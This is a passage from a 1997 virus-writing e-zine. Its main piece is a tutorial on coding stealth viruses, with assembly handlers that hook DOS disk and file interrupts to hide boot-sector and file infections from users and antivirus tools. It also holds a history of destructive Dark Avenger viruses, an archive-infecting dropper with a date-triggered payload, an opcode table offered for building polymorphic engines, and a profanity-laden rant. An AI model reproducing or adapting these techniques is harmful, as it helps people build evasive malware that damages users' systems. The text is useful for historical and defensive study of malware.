"AHCQTEBHHQMABJMSANF"QAUBRNSVSNMDMQPJ$(25) = "DCUVUFPJTL"QAUBRNSVSNMDMQPJ$(26) = "DMNQTQDCGKCOJFTNS"QAUBRNSVSNMDMQPJ$(27) = "LLVKJBVQKOPMU"QAUBRNSVSNMDMQPJ$(28) = "EHSPTKCEIMAUNR"QAUBRNSVSNMDMQPJ$(29) = "QJQREVEJKRPEMJ"QAUBRNSVSNMDMQPJ$(30) = "FTDJILLLBBPSNPOGPD"
End Sub
a handy overviewby MGL/SVL exclusive for *-zine
Introduction
In the very beginning of the computer viruses, when a virus was something very curious, there was noneed to cover the fact of presence of a virus in files, memory or in boot sectors. But shortly after somepeople recognized, they can make money by removing viruses, the whole thing become much harder. Ofcourse, there was no problem to code the virus itself, but the problem was to code such a virus, whichcould not be detected for at least some time by antivirus software. This time was essential for the virus toget in the wild. During the virus history, two basic technologies appeared - STEALTH andPOLYMORPHISM. Both technologies are not unknown to the virus writing community and are used inthe most succesfull viruses. Main goal of this article is to explain, how does stealth work and how to codea stealth virus.
Definition and principles
The STEALTH is the acting by a quiet and secret way, in order to avoid detection or hiding the presenceof something. In the case of a computer virus means the stuff above not only to hide the presence of avirus in the place of storage (file or disc sector) but desirably (only in some cases) also to avoid thedetection by antivirus software. This could be done only by the absolute control of infected computer'soperating system by the virus. Every critical function of operating system should be penetrated and itsreturn(s) changed to the 'normal' values - the values, which one would receive without the presence ofvirus in the system.
Requested knowledge base
To code really working steath virus is not a trivial task. The author has to be able to create and debugresident code - this is a must !!! The reason is very simple - WITHOUT RESIDENCY CAN'T VIRUS BESTEALTH. Debugging of resident code is very important. Stealth, that doesn't work is absolute lameness.Based on my own experiences, one of the best solutions for TSR debugging is Soft-Ice by Nu-MegaTechnologies. With some minor exceptions is Soft-Ice also good for hacking. You 'll need some gooddescription of operating system. In the case of MSDOS you have shitload of possibilities, but probaly themost acurate and most actuall description is the Interrupt List maintained by Ralf Brown. The actualversion is now 53. Books 'Undocumented PC' and 'Undocumented DOS' are of good value for ourpurposes too. Besides the knoledges do not forget to reserve some time for coding and debugging. Andnow - the show can go on ...
Stealth for boot viruses
This case of stealth if the simplest one. We 'll have to work with whole sectors, and this is trivial task.
Sector 0/0/1 is MBR in the case of hard drive, on floppy this sector is boot sector. When a boot virusinfects this sector, the original contens is moved elsewhere. Let's say, the virus stores the original sector0/0/1 to sector 0/0/7. This location is in the virus writing community kinda traditional, it is heritage of theStoned virus. But you can select any other location. After saving the original MBR/boot sector, the virusplaces own copy to sector 0/0/1. Then, after rebooting, the copy of the virus in sector 0/0/1 will be loadedto memory at adress 0:7C00h and 'll be excecuted. Virus then allocates memory for memory ownresident copy, moves itself to "preserved" memory location, always hooks interrupt INT 13h (in somecases also some other interrupts) and then loads and executes stored MBR/boot sector. Woow! the virusis mow resident in memory, and has gained control over INT 13h.
On every disk access virus gets control as first. This is not true in case of disk access using the ports -here the virus can be detected. The main task for viral INT 13h handler is to recirect any attempt toread/write to sector 0/0/1 (where the virus is located) to 0/0/7. Attempts to write to the sector 0/0/7 (nowcontaining the stored MBR/boot sector) should be ignored. If someone 'll try to read sector 0/0/7, we 'llhave to put zeroes to his buffer at ES:BX. Then the handler of INT 13h 'll be like this:
int_13h_entry: pushf cmp dl,80h js flopak ; floppy or hard drive ? ; this should hide the presence of ; virus in the MBR push cx or dl,dl jnz OK ; head 0 ? If so, then if
cmp cx,1 jnz OK ; track 0 sector 1, check critical ; functions
cmp al,1 ja OK ; stealth only when 1 sector read cmp ah,02h ; read jz zvedavec cmp ah,0ah ; long read ( is not necessary ) jz zvedavec cmp ah,03h ; write jz write cmp ah,0bh ; long write (is not necessary ) jnz OKwrite:zvedavec: mov cl,7 ; redirect R/W to stored MBROK: call emulINT13h pop cx ; we call original INT 13h with "good ; parameters and we return callers CX ; which covers our tracks jmp short VRATsa
flopak: .... ; here 'd be handled floppy access .... ; similar to hard drive access ....VRATsa: popf retf 2emulINT13h: pushf call dword ptr cs:[original_INT13h] ret
But i have to say, this handle is not the perfect one. It doesn't handle the situation, when more than 1sector is read or write. In such a case, this handler can be very "unfriendly". Moreover, this handlerdoesn't preserve the sector with stored MBR/boot sector. But to add such a code in not so hard and it ison you ... I have to say, thay only minority of viruses preserve the stored copy of MBR/boot sector. Inmost cases this copy 'll not be overwritten...
!!! IMPORTANT !!!Preserve stored stuff !!!
Stealth for file viruses
Number of file viruses with some stealth is greater than that of boot viruses. Principles of stealth for fileviruses if as follows:
A. infected file has increased size. This size increas should be not visible.
B. majority of file viruses uses some change in size, or time stamp or whatsoever to mark the file asinfected. This change should be :
preserved not visible
C. any change in infected file should be not visible. This affects EXE header in the case of EXE files andinitial JMP to virus body in the case of COM files, as well as any appended stuff to the file.
D. in the case of complex approach, the presence of memory hole, in which virus resides, should by alsohidden.
Viruses, which handle points A+B+C(+D) are full stealth viruses. Viruses, which handles only point A arethat so called semi-stealth viruses. Semi-stealth doesn't need a lot of code, and i 'll explain it first.
A. Semi-stealth
The main task for semi - stealth virus is to hide the size increase on infected files. This can be easilyachieved by cutting the size in DTA after DOS Findfirst / Findnext operations. Such a virus 'll have to
handle not only the most common INT 21H/4EH and INT 21H/4FH, used by utilities of type Norton /Volkov Commander, but also DOS FindfirstFCB / FindnextFCB - INT 21H/11H and INT 21H/12H used byDOS command DIR. When operating with FCB, we have to know, that there is difference between FCBand Extended FCB.
Some necessary stuff about DOS data structures you can find below.
Format of File Control Block:
Offset Size Description (Table 0648) -7 BYTE extended FCB if FFh -6 5 BYTEs reserved -1 BYTE file attribute if extended FCB 00h BYTE drive number (0 = default, 1 = A, etc) 01h 8 BYTEs blank-padded file name 09h 3 BYTEs blank-padded file extension 0Ch WORD current block number 0Eh WORD logical record size 10h DWORD file size 14h WORD date of last write (see #0952 at AX=5700h) 16h WORD time of last write (see #0951 at AX=5700h) (DOS 1.1+) 18h 8 BYTEs reserved (see #0649,#0650,#0651,#0652,#0653) 20h BYTE record within current block 21h DWORD random access record number (if record size is > 64 bytes, high byte is omitted)
Note: to use an extended FCB, you must specify the address of the FFh flag at offset -7, rather than theaddress of the drive number field
Format of FCB reserved field for DOS 3.x:
Offset Size Description (Table 0652) 18h BYTE number of system file table entry for file 19h BYTE attributes bits 7,6: 00 = SHARE.EXE not loaded, disk file 01 = SHARE.EXE not loaded, character device 10 = SHARE.EXE loaded, remote file 11 = SHARE.EXE loaded, local file or device bits 5-0: low six bits of device attribute word---SHARE.EXE loaded, local file--- 1Ah WORD starting cluster of file on disk 1Ch WORD (DOS 3.x) offset within SHARE of sharing record (see #0924 at AH=52h) 1Eh BYTE file attribute 1Fh BYTE ???---SHARE.EXE loaded, remote file--- 1Ah WORD number of sector containing directory entry 1Ch WORD relative cluster within file of last cluster accessed 1Eh BYTE absolute cluster number of last cluster accessed 1Fh BYTE ???---SHARE.EXE not loaded--- 1Ah BYTE (low byte of device attribute word AND 0Ch) OR open mode 1Bh WORD starting cluster of file 1Dh WORD number of sector containing directory entry 1Fh BYTE number of directory entry within sector
Note: if FCB opened on character device, DWORD at 1Ah is set to the address of the device driverheader, then the BYTE at 1Ah is overwritten.
Format of FCB reserved field for DOS 5.0:
Offset Size Description (Table 0653) 18h BYTE number of system file table entry for file 19h BYTE attributes bits 7,6: 00 = SHARE.EXE not loaded, disk file 01 = SHARE.EXE not loaded, character device
10 = SHARE.EXE loaded, remote file 11 = SHARE.EXE loaded, local file or device bits 5-0: low six bits of device attribute word---SHARE.EXE loaded, local file--- 1Ah WORD starting cluster of file on disk 1Ch WORD unique sequence number of sharing record 1Eh BYTE file attributes 1Fh BYTE unused???---SHARE.EXE loaded, remote file--- 1Ah WORD network handle 1Ch DWORD network ID---SHARE not loaded, local device--- 1Ah DWORD pointer to device driver header 1Eh 2 BYTEs unused???---SHARE not loaded, local file--- 1Ah BYTE extra info bit 7: read-only attribute from SFT bit 6: archive attribute from SFT bits 5-0: high bits of sector number 1Bh WORD starting cluster of file 1Dh WORD low word of sector number containing directory entry 1Fh BYTE number of directory entry within sector
Format of FindFirst data block (taken from Ralf's Interrupt list)
Offset Size Description (Table 0913)---PC-DOS 3.10, PC-DOS 4.01, MS-DOS 3.2/3.3/5.0--- 00h BYTE drive letter (bits 0-6), remote if bit 7 set 01h 11 BYTEs search template 0Ch BYTE search attributes---DOS 2.x (and some DOS 3.x???)--- 00h BYTE search attributes 01h BYTE drive letter 02h 11 BYTEs search template---WILDUNIX.COM--- 00h 12 BYTEs 15-character wildcard search pattern and drive letter (packed) 0Ch BYTE search attributes---DOS 2.x and most 3.x--- 0Dh WORD entry count within directory 0Fh DWORD pointer to DTA??? 13h WORD cluster number of start of parent directory---PC-DOS 4.01, MS-DOS 3.2/3.3/5.0--- 0Dh WORD entry count within directory 0Fh WORD cluster number of start of parent directory 11h 4 BYTEs reserved---all versions, documented fields--- 15h BYTE attribute of file found 16h WORD file time (see #0951 at AX=5700h) 18h WORD file date (see #0952 at AX=5700h) 1Ah DWORD file size 1Eh 13 BYTEs ASCIZ filename+extension
The stategy for semi - stealth is very simple.1. Allow the necessary call for operating system.2. If error occured, bail out of the interrupt.3. Get actual DTA.4. Is the file executable? If it isn't, return from interrupt.5. Check the file for infection. If the file is not infected, return from interrupt.6. Cut the file size in DTA and leave the handler.
int_21: .... cmp ah,11h ; this is a part of viral ; INT 21h handler je DIR_STEALTH
cmp ah,12h je DIR_STEALTH cmp ah,4eh je DTA_STEALTH cmp ah,4fh je DTA_STEALTH .... ; here handler continiues
DIR_STEALTH:
call dos_emu ; call original DOS handler of ; INT 21h
pushf pusha push ds,es or al,al ; was the call successfull? jnz exit_size_fcb
mov ah,2fh call dos_emu ; get DTA adress to ES:BX push es pop ds cmp byte ptr [bx],0ff jne FCB_not_extended add bx,7FCB_not_extended: call test_4_executable jc exit_size_fcb ; if not executable, exit call test_4_infection jc exit_size_fcb ; if not infected, exit call test_min_size jc exit_size_fcb ; skip 2 small files
sub word ptr [bx+1dh],virus_size sbb word ptr [bx+1fh],0
exit_size_fcb: pop es pop ds popa popf retf 2
DTA_STEALTH: call dos_emu ; call original DOS handler of ; INT 21h
pushf pusha push ds,es or al,al ; was the call successfull? jnz exit_size_fcb
mov ah,2fh call dos_emu ; get DTA adress to ES:BX push es pop ds
call test_4_executable jc exit_size_dta ; if not executable, exit call test_4_infection jc exit_size_dta ; if not infected, exit call test_min_size jc exit_size_dta ; skip 2 small files
sub word ptr [bx+1ah],virus_size sbb word ptr [bx+1ch],0
exit_size_dta: pop es pop ds popa popf retf 2
As you may noticed, the code for DTA_STEALTH and DIR_STEALTH has a lot of the same stuff, and itcould be possible to code it as one routine.
B. Mark-stealth
To demonstrate the stealth of infection mark, here is some piece of code. It was designed for virus, whichuses as mark seconds in timestamp = 28. This handler doesn't cover the situation, where someone triesto get timestamp. In the case of coplex approach, this situation can be hadled too. But the user mostlikely will not notice any change ... And so this code seems to be optimal.
int_21: .... cmp ah,57h ; this is a part of viral ; INT 21h handler je fn_time .... ; here handler continiues
fn_time: or al,al ; get time ? je bye1 ; that we don't handle pusha push es call test_4_executable jc fn_time_exit0 ; not executable , skip push cx call get_time jnc uninfected ; infected ? pop cx ; yes mov ax,cx and ax,1f xor ax,0e je fn_time_exit0 ; 28 seconds ? then let him do it pop es popa push cx and cl,11100000b xor cl,0f jmp set_28 ; otherwise set always 28fn_time_exit0: pop es popa jmp bye1uninfected: pop cx mov ax,cx and ax,1f xor ax,0e ; set 28 seconds ? jnz fn_time_exit0 ; no exitset_26: pop es popa push cx dec cx ; set 26 secondsset_28: call dosemu pop cx ; but show 28 popf retf 2
bye1: jmp dword ptr cs:[original_INT21h]
C. Full stealth
Semi - stealth is for full stealth virii a must. To get a working full stealth virus, there are two different ways.
desinfection on open / reinfection on close type stealth. true full stealth
It is known fact, that to code virus of first type is much more easier as to code the virus of second type. Tocode viruses of both types requires some experiences, so the code which 'll follow is my well known"meta code".
Desinfection on open / Reinfection on close.
Here is desired not only the desinfection on open and reinfection on close, but also desinfection on4B01h - load and do not execute, which is used by some debugers to load file in the memory. Just forlamers i point to 2 imporant things:
after desinfecting the file, you have lseek to the BOF ! reinfection is prior to file close !
int_21: .... cmp ah,3dh ; this is a part of viral ; INT 21h handler je desinfect cmp ah,3eh je reinfect cmp ah,4bh je infect_file .... ; here handler continiues
infect_file: pusha push ds push es or al,al ; 4B00h jnz next call get_bastard ; infect fileexit_exec: pop es pop ds popa jmp dword ptr cs:[original_INT21h]
next: dec ax jnz exit_exec call open_file_DS_DX ; 4B01h call desinfect1 jmp short exit_execget_bastard: .... ; stuff deleted
call_open_file_DS_DX jc exit_infectget_bastard_handle: .... ; file infection here ....exit_infect: ret
desinfect: call open_file_DS_DX pushf pusha push ds push es
call desinfect1 pop es pop ds popa popf retf 2
desinfect1:comment ~
Here you have to read the saved stuff from infected file to some memory buffer. Then truncate the file toits uninfected size (by writing 0 bytes to file with file pointer set to the location, where the uninfected filehad EOF). And as last, restore the changed stuff from memory buffer and lseek to start of the file. Do notforget, if you alway open file with mode R/W for any DOS call, you may avoid nasty SFT manipulationwhen reinfecting the file on its closing.
~ ..... ; some code :))))
Situation before file is closed is simple... We do not have file name, but we have file handle. So we canuse part of code, which is desiged to infect files on execution.
reinfect: pusha push ds push es call lseek_BOF call get_bastard_handle jmp exec_exit
True full shealth
This is most difficult task for every coder (besides some kick-the-ass poly engine). As this problem is verycomplex, I 'll only explain, what one should do on all critical DOS functions.
INT 21h / 4E,4F,11,12
Do just normal semi-stealth. But be carefull. In some cases, there is necessary to switch stealth off. Sucha case is eg. the call of INT 21h/32h - Get DOS drive parameter block. Such a call is used by softwarelike CHKDSK (all we know this for stealth viruses unfriendly program). To switch stealth on again, justwait for INT 21h/4ch.
INT 21h / 4B01h,40h
This is no problem at all. Just desinfect the file. If you are using stealth with SFT manipulation ( SFTstealth ), you 'll have some minor (for someone major problem). But the the help is siple - refer to my"SFT stealth tutorial" for elegant solution. This tutorial you can find in the Insane Reality #8.
INT 21h / 3Dh
If you are using SFT stealth, just cut the filesize in SFT here. Then noone can seek to the virus body,because DOS thinks, there is EOF in the location, where was EOF before virus body was appended.Otherwise do nothing.
INT 21h / 42h
Do not allow to seek within the virus body. You have to correct all the seeking relative to uninfectedfilesize. Do not forget to handle all the methods (0,1,2). In other words, just manipulate CX and DX.
INT 21h / 3Fh
This 'll be the most difficult part of code. As first check, where is the file pointer located. Just for betterimagination, infected file looks like shown here:
If the file pointer is within the "changed stuff", read to their memory buffer data, which should be there, ifthe file wasn't infected ( from file pointer position to the end of "changed stuff"). Then read the rest ofrequested amount of bytes. Any reading in the area marked as "rest of infected file" is not dangerous.But if you detect, that the read can reach the virus body, cut the read to "legal" size. ( If you 're using SFTstealth, you do not need to handle this. For DOS, the viral body doesn't exist :)))).
INT 21h / 4Ch
Here you can control the execution of some programs. When you wan't to be sure, that some programreally ends, you can do it like this.
on INT 21h/4bh check the program name and store current PID, which is the same as PSPsegment of current process.
on INT 21h/4Ch compare the parents PID ( PSP:16) in current PSP (you can get it via movah,51h/ int 21h, result in BX). If this two values are same, the program ends.
INT 21h / 57h
Here you can stealth the changes in the time stamp. Do not allow to set stamp to "mark" value, and youcan avoid to get the "mark" value by INT 21h / 5700h.
D. MCB stealth
This part is very short. If you want to known the principles and basics, refer to MCB stealth by Darkman inVLAD #6
Conclusions
A. Pro - stealth stealth efectively hides the presence of virus in infected files in some cases stealth virus can spread faster with some lame AV software. (in the past, not now)
B. Contra - stealth
majority of stealth viruses can be catched in memory by simple scanstring. to combine full stealth with variable lenght poly is very hard task. every stealth virus gives exact tutorial, how to remove itself. And this is very, very pitty.
C. Solution:
The solution is TST. TST is trade mark, owned by Online. TST is Copyright (C) 1995-96 by Terror-6. But iam afraid, you 'll have to wait for Terror's next virus.
Some form of stealth is good in the beginning of infection. It helps to spread the virus. But on the otherhand, stealth has some major disadvanteges.
Download attached files here
This little contribution is dedicated to the eternal memory of THE DARK AVENGER(dedicaded to probaly upcoming 26th birthday of this legend ( or Diana's ? )
[ Text in these two lines above is pure speculation. Editor ]
When somebody says computer virus, it 'll not take a long time to say the name Dark Avenger. You askwhy ? If you do not know, you probably suffer of demencia or something like it. You should know, thatDark Avenger is the best known virus writer since the whole the vx scene started in late '80ties.
Its well known, that Dark Avenger is native Bulgarian, from the town of Sofia, and fan of the band IronMaiden. But, probably, the only one, who knows Dark Avenger's real identity is Dark Avenger himself.There were some rumors, that the real name of Dark Avenger is Vesselin Bontchev, who now resides"on some lonely island in the northern Atlantic", but Mr.Bontchev, as well as the Dark Avenger, both 'reof the same opinion:
Bontchev != Dark Avenger
[reason in Bontchev's case is very easy to understand.:) ]
It's also well know, that relationship of Dark Avenger to Vesselin could be described as disrespect,resp. very negative. At least one of variants of Dark Avenger virus targets programs cointaining string'Vesselin Bontchev' and causes system hang if such a programm is run. Moreover, sometines DarkAvenger did use expression " the weassel " when he talked about Bontchev. But we have to saywithout Bontchev, there would be Dark Avenger not so "popular" and well known in the whole world. Inthe fact, Bontchev is the man, who's responsible for the worldwide publicity of Dark Avenger. Thelegend himself claimed, Bontchev made him to Dark Avenger. Moreover, it should be Bontschev, whoengouraged people to create viruses by some of his articles and publications. According to DarkAvenger, some stuff written by Bontchev can be a good tutorial for those people, who want to codeviruses and have no other information available.
But as I don't want to come off the topic, here is brief history of Dark Avenger's cariees as virus writer.
Some 9 or 10 years ago, when there was not such a lot of viruses out, one young Bulgarian boy wasinteresting in rather mysterious and not so well known area in computer science - the viruses. Hethought of "making a programm that would travel on its own .. and to get to the places its creatore couldnever go". After reading an articles which discussed computer viruses he decided to write such a pieceof code. He started work on his first virus in September 1988. Ocassionally he had access to an 4.77MHz XT with no hardisk. As he finished the virus, he added destructive code in it, becauses he had no
idea, what else should he put in. He thought, the virus 'll never travel outside the city. Errare humanumest - to make errors is human. Dark Avenger was wrong in this case. His 651 bytes long virus, whichcointained string 'Eddie lives' arrived in spring 1989 to the USA.
Technically, the Eddie.651 virus is simple TSR with hooked INT 21h, infecting both EXE and COM fileson their execution. Infected file is marked within the timestamp - the value of the second is set to value62. Besides INT 21h function EXEC virus hooks also the funcions FIND_FIRST_FCB andFIND_NEXT_FCB. These functions are called on DOS command DIR. And if such a call occurs, thevirus subtract from size of the file with the second field in timestamp set to 62 its size. As virus doesn'tcheck the size of such a file, if the file is smaller than 651 bytes, DIR shows filesize in gigabytes range.Virus cointains, as said before, string 'Eddie lives'.
Next Dark Avenger's production is well know - the Dark Avenger virus family with members 1800, 2000and 2100 bytes long. All 3 members of this family are residen Com'n'Exe infectors. New idea in thisfamily was the "fast infector" - files were infected not only when execuded, but also when opening,closing, changing attributes and creating. Not so new was the payload - when some condition weremet, virus overwrites sectors at harddisk at random. Really cruel. There were also some texts in thisviruses...
[ofcos, every virus should have some texts, othervise it gets name like 4096 or 193257609 :) ]
Dark Avenger.1800:
Eddie lives...somewhere in timeThis program was written in the city of Sofia (C) 1988-89 Dark Avenger
As described above, Dark Avenger loves Vesselin Bontchev so much, that he included in DarkAvenger.2000 following lovely text string:
(C) 1989 by Vesselin Bontchev
And as the final nail, if programm to be run contains string "Vesselin Bontchev", virus hangs thesystem. In my humble opinion, Dark Avenger tried here to make Bontchev's live to hell with such aoverkill payload. Ofcos, the nice stuff with trashing sectors on the harddisk has not been removed fromthe viral code. As for the 2100 bytes variant, it has some improvements in hiding the size increase ofinfected programs and so. Sources released by the author are included in this issue of our zine.
After some time, Dark Avenger released something absolutely unknown to the world. His another firstwas the hyped Mte - first ever poly engine.
[Washburn's "excercises" i do not count, sorry ... ]
Polymorphism was something new at such a level [ :) ]. Mr. Skulason ( if i remember, responsible forfuckprot or whatsoever) wrote in Virus Bulletin in April '92 that Mte should be "a torture test for R&Ddepartaments of all the antivirus companies". Moreover editor of the Virus Bulletin noticed that "DarkAvenger tech support is presumably better than offered by certain anti-virus vendors". He he he : )))))))
There were two releases of the Mte. In August 1991 was released Mte 0.91á and in April 1992 wasreleased Mte 1.00á . The antivirus vendors were long time not able to detect Mte with 100% reliability.Detection rates were from 0% in case of Xtree's Allsafe v.4.1 or even worse, hanging the computer incase of CPAV and CPAVSOS v.14 to full 100% detection in case of IBM antivirus, F-prot, TBAV andmany others.
Another Dark Avenger's first in the world was the COMMANDER BOMBER virus. In the time of itsappearence, substantial part of AV programs didn't follow the code flow, just scaned for signatures nearthe file beginning and the file end. And now imagine the suprising of that so called virus researchers,that some blody virus is out which is not only inserted somewhere in the middle of the file, but alsocouple of island of code bound with calls and jmps leads to the virus body. [ I would like to see theirfaces in that historical moment ]. But in medias res .... COMMANDER BOMBER is inserting COMinfector. Its own body is 22596 bytes long, but the added code is acually 4096 bytes long. Virus infectsCOM files on their execution, if their size is greater that 5120 bytes and less than 61183 bytes.COMMAND.??? 'll be never infected. Virus selects in the file 4 KB long block an this block is appendedto the file. In this gap 'll be placed the viral code. Then virus generates some kind of garbage code,which brings the processing to the main virus code. Then only thing what garbage generation watchesis the stack and SP value. But, unfortunately, garbage code generation seems to be buggy. ( about 1 of8 samples generated not able to work ). This may be also the reason, why COMMANDER BOMBERwasn't so successfull when we compare with other Dark Avenger's viruses. This virus has also anotherinteresting feature - absolutely no signature in files. But the files do not become infected over and overagain. This is handled but very siple trick. When intected file is to be executed, virus saves its memoryimage to disk and then repares and execudes it. So if the file is infected twice, second infection rebuildsthe file as it was with only one infection. And this firs infection saves to disk file infected only one. It isvery handy trick, and you can try to code something like this.... Just for your information, Jim Bates, theman which is probably responsible for Black Baron of England (aka Christopher Pile) fate, had thefeeling that "althoug there are similarities of style, ... [stuff deleted] ... that code is beyond his [ DarkAvenger's ] limited capabilities."
In my humble opinion, COMMANDER BOMBER has two main weak points.
The first weak point is the garbage generation. Invalid opcodes are not very good in virus code,everyone should avoid them. Otherwise, there is ABSOLUTELY no change to enter the "In the wildlist".
The second weak point of this virus is the lack of encryption or poly engine. It could be a very heavy todefeat virus, if the Dark Aveger combined Mte polymorphism and the COMMANDER BOMBER midfileinfection. But viruses of the later years used such a combination and this leads to very successfulOne_Half virus by Vyvojar. Sources are included in this issue.
But, as not everyone has the necessary abilities, *-Zine is proud to present you the dizzasembly of thisfamous virus. Enjoy it.
Download attached files here
Resources used to write this article:
brain own archive old issues of Virus Bulletin Cicatrix's VDAT 1.8, which is quit good IMHO interview with Dark Avenger by Sara Gordon 1 pizza from my favourite pizzeria 2 bottles of beer 1 pack of chips
Author is not resposible for the bugs in the article. Moreover author in not responsible at all.
Especially 4 Sara G. : What a fuck was the joke with anorak ?
This article is (c) 1997 by the *-Zine. All it's use in whatever form is prohibited without explicit writtenpermission of the *-Zine stuff members. Eventual violation of this restriction will be subject toprosecution. All the legal costs of the *-Zine stuff 'll be payed by the prosecuded.
This is just little article to keep you informed.
The big world of bussines is ruled just by one golden rule. This rule is very simple. Big fishes use to eatsmaller ones ! Only in some exceptional cases can small fish eat bigger one. The latest victim of this rulehas well known name, especially in the virus underground. Because i wanna tell you its name. Read mylips ....
TBAV, Thunderbyte Antivirus, produced by ESSaV B.V., a Netherland based company is no longerindependent ! As stated by TBAV officials, TBAV "decided to become a part of NORMAN Group". Inplain text Norman bought up the TBAV technology and research team. This fact means not only thechange of product name to Norman Thunderbyte Virus Control, but also probably new, and moreagressive advertising for the product.
And this advertising makes me laugh. Just for ilustration, some quotations from Norman Data DefenseSystem materials.
... Norman Thunderbyte Virus Control never become obsolete. [but they provide updates every twomonths ]
... Norman Thunderbyte Virus Control is always one step ahead of the virus writing community [ I think,this 'll be joke of the year, or am I not right ? :)))) ]
... Norman Thunderbyte Virus Control is one of the few virus scanners able to understand OLE2 format ...This means full detection capability of Macroviruses, even encrypted ones ! [ Just check out Slovak_DictatorMarcovirus on other place in this issue to get the corrected opinion :))) ]
... cleaning utility, which enables all users to quickly and effective remove all macroviruses. [ I want tosee it, dudes :) ]
Historia est magistra viteae. In the past, we've shitload of tricks, how to piss TBAV, how to deactivate itsresident driver etc ... In the past, they always were (and always 'll be ) viruses, which forced AVers toless or more change their products. TBAV was no exception. And they should be one step ahead ? Stopkidding ! We will see...
And here is almost complette Intel opcode table. We bring it to you as some kind of help for yourattempts to code new, kick the ass poly engine.
Editors
Download here!
Hi dudez! Here I present to the community result of my work. Basically, this tables are based onopcodes.lst from Ralph's list. All I did is just their transcription to this form. As it took quit a long time, Ihope you will use it and enjoy it.
MGL
Just a marginal notice from 1999 position - the table i prepared in 1997has unfortunately some minor bugs. Some other ppl took over the table and didn'tnotice it exactly as i didn't .... So is the life ... :)))))
Hi guys.
I decided to update Quark's ARJ Dropper for RAR dropping. I think what archive infection have featureat every OS, so i want to include ZIP and LHA dropping to nex relase of *-Zine. What this code doesand what no.
At first it check if is today some day fo August. On this "some" day it launches my payload.
Else it goes to infection. At second it find first ARJ for infection. If it find some then it try to infect it. ifarchive is infected now it is looking for next one ARJ. If is doesnot find any ARJ for infection ti try infectRAR files. RAR file can't be MULTIVOLUME ( at next relase it can be.) , can't be LOCKED and inarchive can't be present AUTENTYCITY informations. RAR infection is verry simply. Go to eof writeheader, write yourself and infection is done.
Download code and exampled here
So I wish you many happy days and connection reset only by beer and never by peer.
Blesk.
My greetings to :
all co-authors of this zine, >>> see ya at next relase #v, >>> I will be back soon Qark, >>> Thank for ARJDrop in VLAD Dalmatin101 >>> I miss you. Ilo >>> Thanx for keys from LAB. Pedro >>> Parchante ozvi se !!!!
PS: Do you know how call worst muttation of AIDS [eic]. I think what Gates [geits] and W95
PS2: To view present.com you must have math-coprocesor.
[ The suff above is original Blesk's one as we received it. English is lousy but Blesky is improving everyday...]
If you are puritan or do not like four letter words, you are pleased in your own interes to skip this article. Itmay cointain examples of bad language and lewdness etc ...
Editor
As i bought in my favourite book store book titled "Modern computer viruses - basics, prevention,protection" i was really pleased. But this feeling didn't last more than few hours. As i red each furtherpage,i became such a strange feeling. As i have substantial part of the book red already elsewhere.
This czech book, titled "Moderni pocitacove viry ....", written by Josef Jaluvka, is divided in two parts.First part is the usual crap like what virus is and what it does, defines type of viruses and etc... Secondpart, in my humble opinion the substantial, is the crutial part of this book. It is quit detailed guide towrite viruses. But ... I mentioned before my strange feeling bout this book. And this second part hasbrought the proves.
About 50 % of this book is ripped from various zines, mostly from VLAD's, 40hexes, NuKe Journals, butalso from serious hardcopy publications which are copyright protected. But this author, son of the bitchgives not only one fucking credit for stoling the text, schemes and sources. Asshole ! Cock suckingmotherfucker ! Fucking lamer ! DIE !!!!!!!!!
As i told it to some people, which work was stolen, they were really angry. Just one example for all ...
One former member of vx underground, now retired, was really ungry . I was asked not to publish hisname and his opinion. But just to ilustrate his pleasure, i put here anonymous some of his opinionz.
... and im not surprised...these books are all shit anyway
all yours tutes 're included. But that dick didn't put one single credit in that book
... no shit! what a jerk
... goddamn fucker. good thing those tutes aren't so great anyway :)
On some other place in the book that 'author' is really without any shame. He just ripped series ofarticles, originally published in elite hardcopy slovak magazine, PC Revue. Even the schemes are thesame ...
I guess, if the true author of that part in book 'll read this (and I know he 'll because he is an AV suckerworking for some company producingr avir iCî), he 'll prosecute that lamer Jaluvka for copyrightviolation. I hope he 'll request at least 1,000,000 for that violation. So, i wish you to lost that case, Mr.Jaluvka ....
[ To the reputable unnamed dude .... I can contact you to really kick the ass layer. Just mail me to oure-mail adress at hotmail. ]
Just to ilustrate some of really valuable information in the book, imagine this. On page 202, chapter 5.1"Pasivni obrana" - Passive protection, Jaluvka describes how the authorz 're trying make it heavier toAVerz. One of these counter - measures should be code optimalization. And he gives some excellentxsamplez in table.
In book two, chapter one, Jaluvka describes some toolz, necessary to fight (and write) computerviruses. He describez Techhelp! 4.0, some deep-inside-DOS books,sourcer, AFD pro, TurboDebugger, Qaid analyser and ... that's all folk :) He has no idea, that some Ralph Brown's Interupt listexist (every good FTP site or BBS has it), that some Soft-Ice debugger is on the nearest warez site,and ofcos, that there is a shitload of virus zines. But, maybe, this omision is just purpous ?
Although the book cointains couple of useless crap and some really screwing mistakes, it could beused as a quit good tute to code viruses. But I think, that is not the thingy the author wanted.
But people, if you are publishing some stuff, do not forget to include that funny C in brackets. Just byputting (C)opyright 1997 by your_name_here you should be protected. And of cos, in case of copyrightviolation you can prosecute the bastard.
This article is (C)opyright, (c)opyleft 1997 by The Ziggy Zag and was written just and only for thebombastic issue #1 of the *-zine.
An Immortal Riot/Genesis orignal (c) 1997 The Unforgiven.May freely be quoted!
Index of this article:(click sensitive) Introduction. Things to do before physics. Red Hot Chili Faces The early Insane Reality - Insanity or Reality? Current life & general adult hints Satisfying one's ego AV-Interview IRL-Papers The horror! Gimme more cheese please Eugene K Side-effects the conversation way Scene-Zines Greets Credits Goodbye's and cya somewhere.. somehow. Quatations & Poetry Future
Introduction
Mgl (Mengele.(P)hD?) told me SVL was about to release a newsletter, and asked me kindly tocontribute a little something to it. He had nothing in mind what I do for them (I said no to source-codecontributions since I didn't feel like decreasing the code quality) so I just had think about somethingmyself. Well, this is the result, perhaps nothing really worth wasting any time with, you decide. Mynature is to please anyone whenever I can so don't held me responsible for you losing your faith inhumanity, society, god or whatever. If someone want me to write just something, surely I'll do it. If hewould've asked if I could give him a blow-job, I would though have turned down the request.
This contribution from me is styled VLAD-AF article.2_5 because I find the scene way too serious andthat article a good read (Yay. I wrote it ;)). This mean this can be seen as a early valentine issue frommyself included in the SVL-e-zine #1. Or it might just bee seen as wasted bytes dedicated to wastedsouls.
Notice that the rest of Immortal Riot/Genesis has nothing to do with this stuff at all. I assume personalcontributions is allowed to other zines, specially since MGL contributed to IRG#8. Also important to
mention is that none of this stuff (I guess) would make it into an IRG-sinze due to our new technicalstyled magazines which I hope you all did enjoy!
So... This is from all of me, to all of you - whoever you are. My dog surely will like it, but an updatedinterview with him won't follow! Parden me.
